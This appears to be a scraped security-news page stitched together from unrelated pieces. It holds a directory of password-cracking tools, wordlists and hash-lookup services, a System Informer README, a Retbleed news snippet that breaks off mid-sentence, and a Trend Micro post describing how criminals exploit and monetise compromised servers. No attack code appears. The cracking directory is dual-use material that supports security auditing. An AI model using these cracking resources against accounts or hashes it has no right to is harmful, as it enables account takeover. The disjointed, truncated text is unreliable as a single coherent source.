  • Wavecrack - Wavestone's web interface for password cracking with hashcat.
  • WebHashCat - WebHashcat is a very simple but efficient web interface for hashcat password cracking tool.

John the Ripper

John the Ripper is "an Open Source password security auditing and password recovery tool available for many operating systems." The following are projects directly related to John the Ripper in one way or another.

  • BitCracker - BitCracker is the first open source password cracking tool for memory units encrypted with BitLocker.
  • johnny - GUI frontend to John the Ripper.

Misc

  • hashID - Software to identify the different types of hashes.
  • Name That Hash - Don't know what type of hash it is? Name That Hash will name that hash type! Identify MD5, SHA256 and 300+ other hashes. Comes with a neat web app.

Websites

Communities

  • hashcat Forum - Forum by the developers of hashcat.
  • Hashmob - A growing password recovery community aimed towards being a center point of collaboration for cryptography enthusiasts.
  • Hashkiller Forum - A password cracking forum with over 20,000 registered users.

Lookup services

  • CMD5 - Provides online MD5 / sha1/ mysql / sha256 encryption and decryption services.
  • CrackStation - Free hash lookup service supplying wordlists as well.
  • Hashes.com - A hash lookup service with paid features.
  • Hashkiller - A hash lookup service with a forum.
  • Online Hash Crack - Cloud password recovery service.

Wordlist tools

Tools for analyzing, generating and manipulating wordlists.

Analysis

  • PACK - A collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics.
  • pcfg_cracker - This project uses machine learning to identify password creation habits of users.
  • Pipal - THE password analyser.

Generation/Manipulation

  • common-substr - Simple tool to extract the most common substrings from an input text. Built for password cracking.
  • Crunch - Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. Crunch can generate all possible combinations and permutations.
  • CUPP - A tool that lets you generate wordlists by user profiling data such as birthday, nickname, address, name of a pet or relative etc.
  • duplicut - Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking).
  • Gorilla - Tool for generating wordlists or extending an existing one using mutations.
  • Keyboard-Walk-Generators - Generate Keyboard Walk Dictionaries for cracking.
  • kwprocessor - Advanced keyboard-walk generator with configureable basechars, keymap and routes.
  • maskprocessor - High-performance word generator with a per-position configureable charset.
  • maskuni - A standalone fast word generator in the spirit of hashcat's mask generator with unicode support.
  • Mentalist - Mentalist is a graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.
  • Phraser - Phraser is a phrase generator using n-grams and Markov chains to generate phrases for passphrase cracking.
  • princeprocessor - Standalone password candidate generator using the PRINCE algorithm.
  • Rephraser - A Python-based reimagining of Phraser using Markov-chains for linguistically-correct password cracking.
  • Rling - RLI Next Gen (Rling), a faster multi-threaded, feature rich alternative to rli found in hashcat utilities.
  • statsprocessor - Word generator based on per-position markov-chains.
  • TTPassGen - Flexible and scriptable password dictionary generator which supportss brute-force, combination, complex rule modes etc.
  • token-reverser - Words list generator to crack security tokens.
  • WikiRaider - WikiRaider enables you to generate wordlists based on country specific databases of Wikipedia.

Wordlists

Laguage specific

  • Albanian wordlist - A mix of names, last names and some albanian literature.
  • Danish Phone Wordlist Generator - This tool can generate wordlists of Danish phone numbers by area and/or usage (Mobile, landline etc.) Useful for password cracking or fuzzing Danish targets.
  • Danish Wordlists - Collection of danish wordlists for cracking danish passwords.
  • French Wordlists - This project aim to provide french word list about everything a person could use as a base password.

Other

  • Packet Storm Wordlists - A substantial collection of different wordlists in multiple languages.
  • Rocktastic - Includes many permutations of passwords and patterns that have been observed in the wild.
  • RockYou2021 - RockYou2021.txt is a MASSIVE WORDLIST compiled of various other wordlists.
  • WeakPass - Collection of large wordlists.

Specific file formats

PDF

  • pdfrip - A multi-threaded PDF password cracking utility equipped with commonly encountered password format builders and dictionary attacks.

PEM

JKS

  • JKS private key cracker - Cracking passwords of private key entries in a JKS fileCracking passwords of private key entries in a JKS file.

ZIP

  • bkcrack - Crack legacy zip encryption with Biham and Kocher's known plaintext attack.
  • frackzip - Small tool for cracking encrypted ZIP archives.

Artificial Intelligence

  • adams - Reducing Bias in Modeling Real-world Password Strength via Deep Learning and Dynamic Dictionaries. - Code for cracking passwords with neural networks.
  • RNN-Passwords - Using the char-rnn to learn and guess passwords.
  • rulesfinder - This tool finds efficient password mangling rules (for John the Ripper or Hashcat) for a given dictionary and a list of passwords.

Research

Papers

Talks



System Informer - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware

System Informer

A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware. Brought to you by Winsider Seminars & Solutions, Inc.

Project Website - Project Downloads


System requirements

Windows 7 or higher, 32-bit or 64-bit.

Features

  • A detailed overview of system activity with highlighting.
  • Graphs and statistics allow you quickly to track down resource hogs and runaway processes.
  • Can't edit or delete a file? Discover which processes are using that file.
  • See what programs have active network connections, and close them if necessary.
  • Get real-time information on disk access.
  • View detailed stack traces with kernel-mode, WOW64 and .NET support.
  • Go beyond services.msc: create, edit and control services.
  • Small, portable and no installation required.
  • 100% Free Software (MIT)

Building the project

Requires Visual Studio (2022 or later).

Execute build_release.cmd located in the build directory to compile the project or load the SystemInformer.sln and Plugins.sln solutions if you prefer building the project using Visual Studio.

You can download the free Visual Studio Community Edition to build the System Informer source code.

See the build readme for more information or if you're having trouble building.

Enhancements/Bugs

Please use the GitHub issue tracker for reporting problems or suggesting new features.

Settings

If you are running System Informer from a USB drive, you may want to save System Informer's settings there as well. To do this, create a blank file named "SystemInformer.exe.settings.xml" in the same directory as SystemInformer.exe. You can do this using Windows Explorer:

  1. Make sure "Hide extensions for known file types" is unticked in Tools > Folder options > View.
  2. Right-click in the folder and choose New > Text Document.
  3. Rename the file to SystemInformer.exe.settings.xml (delete the ".txt" extension).

Plugins

Plugins can be configured from Options > Plugins.

If you experience any crashes involving plugins, make sure they are up to date.

Disk and Network information provided by the ExtendedTools plugin is only available when running System Informer with administrative rights.



New 'Retbleed' Speculative Execution Attack Affects AMD and Intel CPUs

Security researchers have uncovered yet another vulnerability affecting numerous older AMD and Intel microprocessors that could bypass current defenses and result in Spectre-based speculative-execution attacks. DubbedΒ RetbleedΒ by ETH Zurich researchers Johannes Wikner and Kaveh Razavi, the issue is tracked as CVE-2022-29900 (AMD) and CVE-2022-29901 (Intel), with the chipmakersΒ releasingΒ software

The Life Cycle of a Compromised (Cloud) Server

Trend Micro Research has developed a go-to resource for all things related to cybercriminal underground hosting and infrastructure. Today we released the second in this three-part series of reports which detail the what, how, and why of cybercriminal hosting (see the first part here).

As part of this report, we dive into the common life cycle of a compromised server from initial compromise to the different stages of monetization preferred by criminals. It’s also important to note that regardless of whether a company’s server is on-premise or cloud-based, criminals don’t care what kind of server they compromise.

To a criminal, any server that is exposed or vulnerable is fair game.

Cloud vs. On-Premise Servers

Cybercriminals don’t care where servers are located. They can leverage the storage space, computation resources, or steal data no matter what type of server they access. Whatever is most exposed will most likely be abused.

As digital transformation continues and potentially picks up to allow for continued remote working, cloud servers are more likely to be exposed. Many enterprise IT teams, unfortunately, are not arranged to provide the same protection for cloud as on-premise servers.

As a side note, we want to emphasize that this scenario applies only to cloud instances replicating the storage or processing power of an on-premise server. Containers or serverless functions won’t fall victim to this same type of compromise. Additionally, if the attacker compromises the cloud account, as opposed to a single running instance, then there is an entirely different attack life cycle as they can spin up computing resources at will. Although this is possible, however, it is not our focus here.

Attack Red Flags

Many IT and security teams might not look for earlier stages of abuse. Before getting hit by ransomware, however, there are other red flags that could alert teams to the breach.

If a server is compromised and used for cryptocurrency mining (also known as cryptomining), this can be one of the biggest red flags for a security team. The discovery of cryptomining malware running on any server should result in the company taking immediate action and initiating an incident response to lock down that server.

This indicator of compromise (IOC) is significant because while cryptomining malware is often seen as less serious compared to other malware types, it is also used as a monetization tactic that can run in the background while server access is being sold for further malicious activity. For example, access could be sold for use as a server for underground hosting. Meanwhile, the data could be exfiltrated and sold as personally identifiable information (PII) or for industrial espionage, or it could be sold for a targeted ransomware attack. It’s possible to think of the presence of cryptomining malware as the proverbial canary in a coal mine: This is the case, at least, for several access-as-a-service (AaaS) criminals who use this as part of their business model.

Attack Life Cycle

Attacks on compromised servers follow a common path:

  1. Initial compromise: At this stage, whether a cloud-based instance or an on-premise server, it is clear that a criminal has taken over.
  2. Asset categorization: This is the inventory stage. Here a criminal makes their assessment based on questions such as, what data is on that server? Is there an opportunity for lateral movement to something more lucrative? Who is the victim?
  3. Sensitive data exfiltration: At this stage, the criminal steals corporate emails, client databases, and confidential documents, among others. This stage can happen any time after asset categorization if criminals managed to find something valuable.
  4. Cryptocurrency mining: While the attacker looks for a customer for the server space, a target attack, or other means of monetization, cryptomining is used to covertly make money.
  5. Resale or use for targeted attack or further monetization: Based on what the criminal finds during asset categorization, they might plan their own targeted ransomware attack, sell server access for industrial espionage, or sell the access for someone else to monetize further.

Β 

lifecycle compromised server

The monetization lifecycle of a compromised server

Often, targeted ransomware is the final stage. In most cases, asset categorization reveals data that is valuable to the business but not necessarily valuable for espionage.

A deep understanding of the servers and network allows criminals behind a targeted ransomware attack to hit the company where it hurts the most. These criminals would know the dataset, where they live, whether there are backups of the data, and more. With such a detailed blueprint of the organization in their hands, cybercriminals can lock down critical systems and demand higher ransom, as we saw in our 2020 midyear security roundup report.

In addition, while a ransomware attack would be the visible urgent issue for the defender to solve in such an incident, the same attack could also indicate that something far more serious has likely already taken place: the theft of company data, which should be factored into the company’s response planning. More importantly, it should be noted that once a company finds an IOC for cryptocurrency, stopping the attacker right then and there could save them considerable time and money in the future.

Ultimately, no matter where a company’s data is stored, hybrid cloud security is critical to preventing this life cycle.

Β 

The post The Life Cycle of a Compromised (Cloud) Server appeared first on .

❌